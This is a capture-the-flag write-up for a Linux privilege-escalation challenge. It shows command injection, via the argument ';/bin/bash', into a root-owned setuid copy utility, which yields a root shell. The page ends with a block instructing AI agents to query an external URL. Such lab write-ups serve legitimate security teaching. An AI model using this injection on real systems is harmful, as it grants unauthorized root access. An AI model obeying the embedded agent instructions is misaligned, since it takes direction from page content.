# Linux PrivEsc ### Objective Description Find a method to escalate privileges inside this terminal and then run the binary in /root

### Solution While we enumerate for potential paths to elevate our privileges, we find a binary named "simplecopy" that has the user sticky bit set.

Because this binary has the sticky bit set for user, it will run with the privileges of the owner. Since the owner is root, exploiting it may give us root privs. ``` elf@297f9110cc92:~$ /usr/bin/simplecopy Usage: /usr/bin/simplecopy ``` It appears that it is indeed a simple copy utility. We find that we are able to inject commands into the arguments for this binary. Using this vulnerability, we can spawn a shell as Root & run the binary specified in the objective to complete this challenge. ``` elf@297f9110cc92:~$ /usr/bin/simplecopy /tmp/ ";/bin/bash" cp: missing destination file operand after '/tmp/' Try 'cp --help' for more information. root@297f9110cc92:~# whoami && id root uid=0(root) gid=0(root) groups=0(root),1000(elf) ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://holidayhack23.thepestotech.com/linux-privesc.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.